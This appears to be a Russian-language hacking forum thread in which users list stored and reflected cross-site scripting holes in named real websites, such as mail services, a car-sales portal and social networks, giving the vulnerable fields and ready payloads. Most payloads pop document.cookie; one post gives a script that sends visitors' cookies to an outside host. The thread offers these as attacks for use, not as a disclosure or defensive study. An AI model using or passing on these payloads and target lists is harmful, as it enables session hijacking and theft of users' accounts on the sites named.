HTML: http://www.tourjournals.ru/user/register Уязвимые поля: 1 .Настоящее имя и фамилия (по желанию) 2 .Немного о себе 3. Откуда Вы? 4. Домашняя страничка
Уважаемые модераторы сего раздела, вы зае*али удалять мои сообщения. Активная XSS в теле письма на mail.ru: http://brainpillow.cc/bugtraq/mail.ru_active_xss_15.04.2010.txt Активная XSS в теле письма на mail.com: http://brainpillow.cc/bugtraq/mail.com_active_xss_15.04.2010.txt Активная XSS в теле письма на ukr.net: http://brainpillow.cc/bugtraq/ukr.net_active_xss_15.04.2010.txt Активная XSS в теле письма на qip.ru: http://brainpillow.cc/bugtraq/qip.ru_active_xss_16.04.2010.txt
e1.ru Посещаемость до 280к/день ТИЦ:3100 http://www.e1.ru/auto/sale/485057.html http://www.e1.ru/auto/truck/27138.html Размещаем обявление: в первом случае уязвимо поле VIN во втором уязвимо поле ПРОДАВЕЦ
http://smspartner.biz/ http://partners.smsbz.ru/ http://partners.lika-x.ru/ уязвимое поле ник. редачить можно в профиле. <script>alert()</script>
http://www.mail.az/ уязвимы все поля регистрации Имя Фамилия Страна Город логин.... "><script>alert(document.cookie)</script> "><script>alert('xss')</script> ------------------------------------------------------- http://www.freenet.am уязвимы все поля регистрации Full name Country, City E-mail Secret Question "><script>alert(document.cookie)</script>
klgd.ru при регистрации уязвимые поля: Имя и Логин http://www.klgd.ru/reception/forum/index.php?PAGE_NAME=profile_view&UID=14134
Активка в теле http://www.liveinternet.ru/im/inbox PHP: "'></title><script>alert(document.cookie)</script> Отправляем ответ на любое входящее сообщение и получаем активку в теле сообщения.
Активная XSS в теле письма на mail.kz: http://brainpillow.cc/bugtraq/mail.kz_active_xss_19.05.2010.txt
liveinterne Отправляем Личные сообщения: http://www.liveinternet.ru/im/letter/create в теле сообщения: PHP: <script>alert("found by life_glider");</script>
украинская соц.сеть connect.ua активная xss в описании фотографии exploi </title><script>alert()</script>
Какой то хостинг сайтов. уязвимые поля в профиле: Имя и Фамилия. пример. http://www.che.ru/users/index.php?flt_personal_birthday_day=07-05
Code: http://www.mysql.ru/search/?b=1&terms=<script>alert(123)</script> не активная правда, но мне просто нравится где)
При создании объявления в поле "текст объявления": Code: <script> img = new Image(); img.src = "http://site.ru/sniff.gif?"+document.cookie; </script>
CMS Legal Code: http://www.cmslegal.ru/ourpeople/pages/default.aspx First Name иле Last Name: PHP: "><script>alert(document.cookie)</script><"
Code: http://www.quotationspage.com/search.php3?Search=&startsearch=Search в Quotation или Author: PHP: "><script>alert(document.cookie)</script><" Code: http://mail.mostweb.cc/JumpTo.php?LinkID=23"<script>alert(document.cookie)</script> Code: http://classicauthors.net/JumpTo.php?LinkID=30"<script>alert(document.cookie)</script>